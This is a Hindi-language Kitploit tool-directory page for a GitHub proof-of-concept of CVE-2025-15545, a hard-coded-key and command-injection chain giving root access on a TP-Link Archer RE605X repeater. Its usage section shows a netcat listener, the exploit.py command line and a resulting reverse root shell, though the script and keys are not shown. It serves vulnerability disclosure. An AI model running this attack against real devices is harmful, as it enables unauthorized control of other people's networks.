Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-15545 — CVE-2025-15545 के लिए प्रमाण की अवधारणा | Kitploit
उपकरण/GitHubGitHub/xernary/cve-2025-15545
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगकमांड एंड कंट्रोल
GitHubxernary/cve-2025-15545

CVE-2025-15545

CVE-2025-15545 के लिए प्रमाण की अवधारणा

रिपॉजिटरी देखें
127 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2025-15545

जानकारी

विक्रेता: TP-Link
विक्रेता की वेबसाइट: TP-Link
मॉडल: Archer RE605X
हार्डवेयर संस्करण: RE605X v3.0
फर्मवेयर संस्करण: RE605X(EU)_V3_1.1.5 Build 20240905
फर्मवेयर डाउनलोड पता: TP-Link

कठोर-कोडित क्रिप्टोग्राफिक कुंजियों के उपयोग और XML कॉन्फ़िगरेशन पार्सर घटक में एक कमांड इंजेक्शन सहित कमजोरियों की एक श्रृंखला, एक स्थानीय प्रमाणित हमलावर को डिवाइस पर रूट के रूप में रिमोट कोड निष्पादन (RCE) प्राप्त करने की अनुमति देती है।

PoC आवश्यकताएँ

नोट: exploit.py प्रूफ-ऑफ-कॉन्सेप्ट एक श्रृंखलाबद्ध हमले के परिदृश्य को प्रदर्शित करता है और एक अतिरिक्त पूर्वापेक्षा के रूप में एक प्रमाणित उपयोगकर्ता से क्रेडेंशियल्स पर निर्भर करता है। यह प्रमाणीकरण चरण CVE-2025-15545 द्वारा कवर नहीं किया गया है और केवल प्रदर्शन उद्देश्यों के लिए शामिल किया गया है।

  • हमलावर और पीड़ित दोनों को रिपीटर के स्थानीय नेटवर्क से जुड़ा होना चाहिए।
  • पीड़ित को रिपीटर के वेब नियंत्रण पैनल में प्रमाणित होना चाहिए।

उपयोग

एक अलग टर्मिनल पर आने वाले कनेक्शनों को सुनें:

root@kitploit:~
$ nc -lvnp 4444

exploit.py स्क्रिप्ट को निष्पादित करें:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

नोट: aes_key और aes_iv डिवाइस द्वारा कॉन्फ़िगरेशन फ़ाइलों के एन्क्रिप्शन और डिक्रिप्शन के लिए उपयोग की जाने वाली कठोर-कोडित क्रिप्टोग्राफिक कुंजियाँ हैं, और इस प्रूफ-ऑफ-कॉन्सेप्ट के लिए आवश्यक हैं। सुरक्षा कारणों से उन्हें यहाँ साझा नहीं किया जा सकता है।

रिवर्स शेल पहले टर्मिनल पर प्राप्त होता है:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

संदर्भ

ये कमजोरियाँ Nicola Giuffrida द्वारा रिपोर्ट की गईं।

  • पूर्ण लेख: https://nico-security.com/posts/cve-2025-15545
  • CVE रिकॉर्ड: https://www.cve.org/cverecord?id=CVE-2025-15545
  • TP-Link सलाह: https://www.tp-link.com/us/support/faq/4929
टूल डाउनलोड करें